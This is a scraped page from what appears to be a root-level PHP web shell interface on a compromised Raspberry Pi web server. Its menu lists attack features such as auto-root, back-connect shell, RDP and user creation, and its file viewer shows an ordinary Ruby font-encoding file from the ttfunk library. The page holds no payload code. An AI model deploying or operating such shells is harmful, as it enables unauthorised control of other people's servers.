Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
ttfunk /
table /
cmap /
[ HOME SHELL ]
Name
Size
Permission
Action
format00.rb
1.51
KB
-rw-r--r--
format04.rb
3.98
KB
-rw-r--r--
format06.rb
1.33
KB
-rw-r--r--
format10.rb
1.54
KB
-rw-r--r--
format12.rb
2.09
KB
-rw-r--r--
subtable.rb
2.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : format00.rb
require_relative '../../encoding/mac_roman' require_relative '../../encoding/windows_1252' module TTFunk class Table class Cmap module Format00 attr_reader :language attr_reader :code_map # Expects a hash mapping character codes to glyph ids (where the # glyph ids are from the original font). Returns a hash including # a new map (:charmap) that maps the characters in charmap to a # another hash containing both the old (:old) and new (:new) glyph # ids. The returned hash also includes a :subtable key, which contains # the encoded subtable for the given charmap. def self.encode(charmap) next_id = 0 glyph_indexes = Array.new(256, 0) glyph_map = { 0 => 0 } new_map = charmap.keys.sort.each_with_object({}) do |code, map| glyph_map[charmap[code]] ||= next_id += 1 map[code] = { old: charmap[code], new: glyph_map[charmap[code]] } glyph_indexes[code] = glyph_map[charmap[code]] map end # format, length, language, indices subtable = [0, 262, 0, *glyph_indexes].pack('nnnC*') { charmap: new_map, subtable: subtable, max_glyph_id: next_id + 1 } end def [](code) @code_map[code] || 0 end def supported? true end private def parse_cmap! @language = read(4, 'x2n') @code_map = read(256, 'C*') end end end end end
Close